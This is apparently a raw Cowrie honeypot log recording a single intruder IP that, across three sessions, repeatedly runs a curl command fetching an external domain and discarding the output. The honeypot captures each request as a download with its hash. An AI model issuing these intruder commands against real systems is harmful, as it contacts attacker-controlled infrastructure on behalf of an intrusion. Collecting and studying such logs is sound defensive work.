{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.941973Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.944815Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.945337Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.950124Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.953288Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.958026Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.958941Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.959455Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.961240Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.961764Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.967211Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.992911Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.994890Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.999096Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.000624Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.002237Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.003423Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.005062Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.005469Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.006388Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.007022Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.012234Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.068994Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.072180Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.074804Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.076148Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.078651Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.080403Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.081489Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.083694Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.084569Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.086154Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.088085Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.091257Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.124198Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.129644Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.130796Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.131587Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.132986Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.133712Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.137096Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.137998Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.143767Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.170783Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.171567Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.174976Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.175843Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.178441Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.179192Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.182547Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.186635Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.212397Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.213148Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.217585Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.218346Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.220736Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.221466Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.250378Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.252386Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.254303Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.255076Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.262397Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.263276Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.265296Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.266268Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.272829Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.299423Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.300133Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.303841Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.306814Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.307462Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.308855Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.309376Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.339486Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.340225Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.348539Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.351138Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.352069Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.354177Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.355982Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
